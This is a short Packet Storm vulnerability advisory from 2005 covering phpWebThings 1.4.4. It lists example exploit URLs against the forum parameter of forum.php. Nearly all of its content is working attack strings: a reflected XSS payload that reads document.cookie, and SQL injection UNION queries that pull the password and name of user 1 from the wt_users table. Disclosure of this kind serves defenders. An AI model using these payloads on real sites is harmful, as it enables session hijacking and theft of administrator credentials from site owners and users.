phpWebThings144.txt

2005-11-08T00:00:00
ID PACKETSTORM:41342
Type packetstorm
Reporter Linux_Drox
Modified 2005-11-08T00:00:00

Description

                                        
                                            `Vulnerable: phpWebThings 1.4.4  
http://phpwebthings.org  
  
The bug reside in : forum.php   
  
Exploit :  
  
http://xxx.com/forum.php?forum=[XSS]  
http://xxx.com/forum.php?forum=[SQL]  
  
Example :  
  
XSS  
  
http://xxx.com/forum.php?forum='><script>alert(document.cookie)</script>  
  
SQL  
  
For Passowrd  
  
http://xxx.com/forum.php?forum=-1 union select password,password,null,null,null,null from wt_users where uid=1/*  
  
For Name  
  
http://xxx.com/forum.php?forum=-1 union select name,name,null,null,null,null from wt_users where uid=1/*  
  
  
  
Discovery by Linux_Drox  
  
http://www.lezr.com  
  
Best Regards  
`